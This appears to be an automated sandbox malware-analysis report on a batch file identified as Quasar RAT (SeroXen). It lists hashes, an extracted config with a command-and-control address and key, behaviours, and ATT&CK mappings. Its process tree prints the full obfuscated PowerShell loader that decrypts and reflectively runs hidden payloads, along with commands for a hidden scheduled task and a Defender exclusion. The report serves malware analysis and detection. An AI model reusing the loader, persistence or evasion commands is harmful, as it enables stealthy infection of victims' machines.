quasar | a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef

General

Target

rename me.bat
Size

514KB
MD5

414264bb47935bed191128cf44f3a2cd
SHA1

df49e4f8bc8d388c9b9398f29b0de0e72e79b130
SHA256

a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef
SHA512

c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66
SSDEEP

12288:40xb2yL+sSyycyuVWTuM+EiWCCPt2EIKgEtoOT9ah:46bTLrSyycy9uM+EipCfhgTOTAh

Score

10^/10

quasar seroxen spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SeroXen

C2

147.185.221.19:33587

Mutex

$Sxr-2rfrZTKITtK0P0zGYG

Attributes

encryption_key
Yr0YpBPNd3kXsl43jZMx
install_name
$sxr-sdinwn.exe
log_directory
$sxr
reconnect_delay
3000
startup_key
$sxr-metsha
subdirectory
sxr

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral3/memory/4004-75-0x0000000007B80000-0x0000000007BEE000-memory.dmp	family_quasar

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

2 4004 powershell.exe
Drops file in Drivers directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts powershell.exe
Executes dropped EXE 1 IoCs

Processes:

$sxr-sdinwn.exe

pid process

3808 $sxr-sdinwn.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

4736 schtasks.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command and Scripting Interpreter
T1059

Processes:

ipconfig.exe

pid process

1936 ipconfig.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings powershell.exe

flow	pid	process
2	4004	powershell.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	powershell.exe

pid	process
3808	$sxr-sdinwn.exe

flow	ioc
1	ip-api.com

pid	process
4736	schtasks.exe

pid	process
1936	ipconfig.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$sxr-sdinwn.exepowershell.exe

pid	process
1012	powershell.exe
1012	powershell.exe
4472	powershell.exe
4472	powershell.exe
4004	powershell.exe
4004	powershell.exe
3808	$sxr-sdinwn.exe
1840	powershell.exe
3808	$sxr-sdinwn.exe
1840	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1012	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeIncreaseQuotaPrivilege	4472	powershell.exe
Token: SeSecurityPrivilege	4472	powershell.exe
Token: SeTakeOwnershipPrivilege	4472	powershell.exe
Token: SeLoadDriverPrivilege	4472	powershell.exe
Token: SeSystemProfilePrivilege	4472	powershell.exe
Token: SeSystemtimePrivilege	4472	powershell.exe
Token: SeProfSingleProcessPrivilege	4472	powershell.exe
Token: SeIncBasePriorityPrivilege	4472	powershell.exe
Token: SeCreatePagefilePrivilege	4472	powershell.exe
Token: SeBackupPrivilege	4472	powershell.exe
Token: SeRestorePrivilege	4472	powershell.exe
Token: SeShutdownPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeSystemEnvironmentPrivilege	4472	powershell.exe
Token: SeRemoteShutdownPrivilege	4472	powershell.exe
Token: SeUndockPrivilege	4472	powershell.exe
Token: SeManageVolumePrivilege	4472	powershell.exe
Token: 33	4472	powershell.exe
Token: 34	4472	powershell.exe
Token: 35	4472	powershell.exe
Token: 36	4472	powershell.exe
Token: SeIncreaseQuotaPrivilege	4472	powershell.exe
Token: SeSecurityPrivilege	4472	powershell.exe
Token: SeTakeOwnershipPrivilege	4472	powershell.exe
Token: SeLoadDriverPrivilege	4472	powershell.exe
Token: SeSystemProfilePrivilege	4472	powershell.exe
Token: SeSystemtimePrivilege	4472	powershell.exe
Token: SeProfSingleProcessPrivilege	4472	powershell.exe
Token: SeIncBasePriorityPrivilege	4472	powershell.exe
Token: SeCreatePagefilePrivilege	4472	powershell.exe
Token: SeBackupPrivilege	4472	powershell.exe
Token: SeRestorePrivilege	4472	powershell.exe
Token: SeShutdownPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeSystemEnvironmentPrivilege	4472	powershell.exe
Token: SeRemoteShutdownPrivilege	4472	powershell.exe
Token: SeUndockPrivilege	4472	powershell.exe
Token: SeManageVolumePrivilege	4472	powershell.exe
Token: 33	4472	powershell.exe
Token: 34	4472	powershell.exe
Token: 35	4472	powershell.exe
Token: 36	4472	powershell.exe
Token: SeIncreaseQuotaPrivilege	4472	powershell.exe
Token: SeSecurityPrivilege	4472	powershell.exe
Token: SeTakeOwnershipPrivilege	4472	powershell.exe
Token: SeLoadDriverPrivilege	4472	powershell.exe
Token: SeSystemProfilePrivilege	4472	powershell.exe
Token: SeSystemtimePrivilege	4472	powershell.exe
Token: SeProfSingleProcessPrivilege	4472	powershell.exe
Token: SeIncBasePriorityPrivilege	4472	powershell.exe
Token: SeCreatePagefilePrivilege	4472	powershell.exe
Token: SeBackupPrivilege	4472	powershell.exe
Token: SeRestorePrivilege	4472	powershell.exe
Token: SeShutdownPrivilege	4472	powershell.exe
Token: SeDebugPrivilege	4472	powershell.exe
Token: SeSystemEnvironmentPrivilege	4472	powershell.exe
Token: SeRemoteShutdownPrivilege	4472	powershell.exe
Token: SeUndockPrivilege	4472	powershell.exe
Token: SeManageVolumePrivilege	4472	powershell.exe
Token: 33	4472	powershell.exe
Token: 34	4472	powershell.exe
Token: 35	4472	powershell.exe

Suspicious use of WriteProcessMemory 27 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 3344 wrote to memory of 1012	3344	cmd.exe	powershell.exe
PID 3344 wrote to memory of 1012	3344	cmd.exe	powershell.exe
PID 3344 wrote to memory of 1012	3344	cmd.exe	powershell.exe
PID 1012 wrote to memory of 4472	1012	powershell.exe	powershell.exe
PID 1012 wrote to memory of 4472	1012	powershell.exe	powershell.exe
PID 1012 wrote to memory of 4472	1012	powershell.exe	powershell.exe
PID 1012 wrote to memory of 4176	1012	powershell.exe	WScript.exe
PID 1012 wrote to memory of 4176	1012	powershell.exe	WScript.exe
PID 1012 wrote to memory of 4176	1012	powershell.exe	WScript.exe
PID 4176 wrote to memory of 3096	4176	WScript.exe	cmd.exe
PID 4176 wrote to memory of 3096	4176	WScript.exe	cmd.exe
PID 4176 wrote to memory of 3096	4176	WScript.exe	cmd.exe
PID 3096 wrote to memory of 4004	3096	cmd.exe	powershell.exe
PID 3096 wrote to memory of 4004	3096	cmd.exe	powershell.exe
PID 3096 wrote to memory of 4004	3096	cmd.exe	powershell.exe
PID 4004 wrote to memory of 4736	4004	powershell.exe	schtasks.exe
PID 4004 wrote to memory of 4736	4004	powershell.exe	schtasks.exe
PID 4004 wrote to memory of 4736	4004	powershell.exe	schtasks.exe
PID 4004 wrote to memory of 3808	4004	powershell.exe	$sxr-sdinwn.exe
PID 4004 wrote to memory of 3808	4004	powershell.exe	$sxr-sdinwn.exe
PID 4004 wrote to memory of 3808	4004	powershell.exe	$sxr-sdinwn.exe
PID 4004 wrote to memory of 1840	4004	powershell.exe	powershell.exe
PID 4004 wrote to memory of 1840	4004	powershell.exe	powershell.exe
PID 4004 wrote to memory of 1840	4004	powershell.exe	powershell.exe
PID 4004 wrote to memory of 1936	4004	powershell.exe	ipconfig.exe
PID 4004 wrote to memory of 1936	4004	powershell.exe	ipconfig.exe
PID 4004 wrote to memory of 1936	4004	powershell.exe	ipconfig.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\rename me.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3344

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\rename me.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\rename me.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
2⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1012

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_454_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_454.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4472

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_454.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:4176

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_454.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3096

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('u1oRCj2FshaYqShJzWoB9MDj3heRxmVxxmXikszKBtg='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uZjnBsjcIwRFHmtV5yG+9A=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BrvxA=New-Object System.IO.MemoryStream(,$param_var); $VtfzT=New-Object System.IO.MemoryStream; $asXGT=New-Object System.IO.Compression.GZipStream($BrvxA, [IO.Compression.CompressionMode]::Decompress); $asXGT.CopyTo($VtfzT); $asXGT.Dispose(); $BrvxA.Dispose(); $VtfzT.Dispose(); $VtfzT.ToArray();}function execute_function($param_var,$param2_var){ $ulMDb=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $TvXyl=$ulMDb.EntryPoint; $TvXyl.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_454.bat';$lVIfc=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_454.bat').Split([Environment]::NewLine);foreach ($ZSRPZ in $lVIfc) { if ($ZSRPZ.StartsWith(':: ')) { $Lwvfw=$ZSRPZ.Substring(3); break; }}$payloads_var=[string[]]$Lwvfw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
5⤵
- Blocklisted process makes network request
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4004

C:\Windows\SysWOW64\schtasks.exe
"schtasks" /create /tn "$sxr-metsha" /sc ONLOGON /tr "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" /rl HIGHEST /f
6⤵
- Creates scheduled task(s)
PID:4736

C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
"C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe"
6⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:3808

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath (Get-Item -LiteralPath $env:SystemRoot).Root"
6⤵
- Suspicious behavior: EnumeratesProcesses
PID:1840

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
6⤵
- Gathers network information
PID:1936

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Scheduled Task/Job

1

T1053

Command and Scripting Interpreter

1

T1059

Persistence

Scheduled Task/Job

1

T1053

Privilege Escalation

Scheduled Task/Job

1

T1053

Defense Evasion

Credential Access

Discovery

System Information Discovery

2

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
5dc9a9599fb11ee70f9164d8fea15abf

SHA1
85faf41a206f3fa8b469609333558cf817df2cda

SHA256
3f033142ed64a5d1e1e19d11a710e22a32827e98922769497ed6bd6e452e44de

SHA512
499407006c53a5f8e5b2b00dab734613762e66a9080504ab50d21e4c8a32b75d7308ccaa0cecfbeb7058044448a40912715da1f02ec72994596d567b515dcfca

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
552B

MD5
f2beebe547851b37c0a8293e3bd2b95c

SHA1
4f5920949efaf43096392779fa5a441d0f5c65fe

SHA256
a5894a151f79cb8a20fc52110c99bb76819fb1551b1e3f2d84500f948c0de31c

SHA512
f3b03d0448636560e5cb0e4ee338fe3c44837e7200ecd96f83b6fe9e5d0309655a7232a679baa0201776556740b9abe725630ea66578efa9040b0ef075491fe4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
17KB

MD5
18c4be9e64a0d0f245f9859a425914e6

SHA1
9e56ddf1e3832e6a623dc0f3735fed4edaed7df1

SHA256
302efa39082c62d0a4fc9dcc6b4f32ffa68fdc9a2a74ca87619a0fb8b4e93628

SHA512
0725a05aae7572526919a66a2e9057de49af1dc643803005df76f7f35b42262a80fadf41771fbecb6a2951e72e1b891359aa07b70ceb19dd274509d0a2cf2bbc

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vc1nr0rb.jf3.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_454.bat
Filesize
514KB

MD5
414264bb47935bed191128cf44f3a2cd

SHA1
df49e4f8bc8d388c9b9398f29b0de0e72e79b130

SHA256
a59ef50cd65d900c84024d9da88c4c93c9ae7fba7e2429c41d45081d381ad8ef

SHA512
c15ca12cd576157369574c3a51ece0879ccee3b57614af91d6e99af21e8fdeb46d1680e2692a38d4da6b4ebb63f9e17341d0cc6ac616e6c2ebd36e698e588e66

Download Submit
C:\Users\Admin\AppData\Roaming\startup_str_454.vbs
Filesize
115B

MD5
04ef436a45d9facc49587df0e5360246

SHA1
02db5c2e48bc01d20183bc5b3dbb49e46471371b

SHA256
e51b4c8060834d2eba5b5eee185a57ac2cc413845887946e1f50fb297e3358be

SHA512
b2bfc75c790aa1c908f28c816e2d5faec4c5e4b4f20c35c63d2202b2563e28ce7febf33d07a5e76c9c824547568e11ab9c88f77940e166e8ed5809067dadd976

Download Submit
C:\Users\Admin\AppData\Roaming\sxr\$sxr-sdinwn.exe
Filesize
411KB

MD5
bc4535f575200446e698610c00e1483d

SHA1
78d990d776f078517696a2415375ac9ebdf5d49a

SHA256
88e1993beb7b2d9c3a9c3a026dc8d0170159afd3e574825c23a34b917ca61122

SHA512
a9b4197f86287076a49547c8957c0a33cb5420bf29078b3052dc0b79808e6b5e65c6d09bb30ab6d522c51eb4b25b3fb1e3f3692700509f20818cfcc75b250717

Download Submit
memory/1012-23-0x0000000009080000-0x0000000009626000-memory.dmp

Filesize
5.6MB

Download
memory/1012-7-0x0000000005630000-0x0000000005696000-memory.dmp

Filesize
408KB

Download
memory/1012-16-0x0000000005D30000-0x0000000006087000-memory.dmp

Filesize
3.3MB

Download
memory/1012-17-0x00000000061C0000-0x00000000061DE000-memory.dmp

Filesize
120KB

Download
memory/1012-18-0x0000000006340000-0x000000000638C000-memory.dmp

Filesize
304KB

Download
memory/1012-19-0x0000000007A00000-0x000000000807A000-memory.dmp

Filesize
6.5MB

Download
memory/1012-20-0x0000000006790000-0x00000000067AA000-memory.dmp

Filesize
104KB

Download
memory/1012-21-0x0000000002890000-0x0000000002898000-memory.dmp

Filesize
32KB

Download
memory/1012-22-0x00000000073E0000-0x0000000007442000-memory.dmp

Filesize
392KB

Download
memory/1012-4-0x0000000005700000-0x0000000005D2A000-memory.dmp

Filesize
6.2MB

Download
memory/1012-5-0x0000000005420000-0x0000000005442000-memory.dmp

Filesize
136KB

Download
memory/1012-1-0x0000000075130000-0x00000000758E1000-memory.dmp

Filesize
7.7MB

Download
memory/1012-2-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/1012-6-0x00000000055C0000-0x0000000005626000-memory.dmp

Filesize
408KB

Download
memory/1012-3-0x00000000050C0000-0x00000000050D0000-memory.dmp

Filesize
64KB

Download
memory/1012-77-0x0000000075130000-0x00000000758E1000-memory.dmp

Filesize
7.7MB

Download
memory/1012-0-0x0000000002E10000-0x0000000002E46000-memory.dmp

Filesize
216KB

Download
memory/1840-116-0x0000000007E60000-0x0000000007E75000-memory.dmp

Filesize
84KB

Download
memory/1840-102-0x0000000007870000-0x0000000007892000-memory.dmp

Filesize
136KB

Download
memory/1840-104-0x0000000071320000-0x000000007136C000-memory.dmp

Filesize
304KB

Download
memory/1840-113-0x0000000007B20000-0x0000000007BC4000-memory.dmp

Filesize
656KB

Download
memory/1840-114-0x0000000007E20000-0x0000000007E31000-memory.dmp

Filesize
68KB

Download
memory/1840-115-0x0000000007E50000-0x0000000007E5E000-memory.dmp

Filesize
56KB

Download
memory/1840-117-0x0000000007EB0000-0x0000000007ECA000-memory.dmp

Filesize
104KB

Download
memory/1840-118-0x0000000007E90000-0x0000000007E98000-memory.dmp

Filesize
32KB

Download
memory/3808-101-0x0000000006E30000-0x0000000006E76000-memory.dmp

Filesize
280KB

Download
memory/4004-78-0x0000000007D50000-0x0000000007D62000-memory.dmp

Filesize
72KB

Download
memory/4004-76-0x0000000007C90000-0x0000000007D22000-memory.dmp

Filesize
584KB

Download
memory/4004-79-0x0000000008010000-0x000000000804C000-memory.dmp

Filesize
240KB

Download
memory/4004-75-0x0000000007B80000-0x0000000007BEE000-memory.dmp

Filesize
440KB

Download
memory/4472-50-0x0000000007410000-0x00000000074B4000-memory.dmp

Filesize
656KB

Download
memory/4472-48-0x0000000002B80000-0x0000000002B90000-memory.dmp

Filesize
64KB

Download
memory/4472-52-0x0000000007860000-0x00000000078F6000-memory.dmp

Filesize
600KB

Download
memory/4472-54-0x0000000002B80000-0x0000000002B90000-memory.dmp

Filesize
64KB

Download
memory/4472-51-0x0000000007650000-0x000000000765A000-memory.dmp

Filesize
40KB

Download
memory/4472-57-0x0000000075130000-0x00000000758E1000-memory.dmp

Filesize
7.7MB

Download
memory/4472-49-0x0000000002B80000-0x0000000002B90000-memory.dmp

Filesize
64KB

Download
memory/4472-53-0x00000000077E0000-0x00000000077F1000-memory.dmp

Filesize
68KB

Download
memory/4472-47-0x00000000073E0000-0x00000000073FE000-memory.dmp

Filesize
120KB

Download
memory/4472-38-0x0000000071320000-0x000000007136C000-memory.dmp

Filesize
304KB

Download
memory/4472-36-0x00000000073A0000-0x00000000073D4000-memory.dmp

Filesize
208KB

Download
memory/4472-37-0x000000007F200000-0x000000007F210000-memory.dmp

Filesize
64KB

Download
memory/4472-26-0x0000000002B80000-0x0000000002B90000-memory.dmp

Filesize
64KB

Download
memory/4472-27-0x0000000002B80000-0x0000000002B90000-memory.dmp

Filesize
64KB

Download
memory/4472-25-0x0000000075130000-0x00000000758E1000-memory.dmp

Filesize
7.7MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads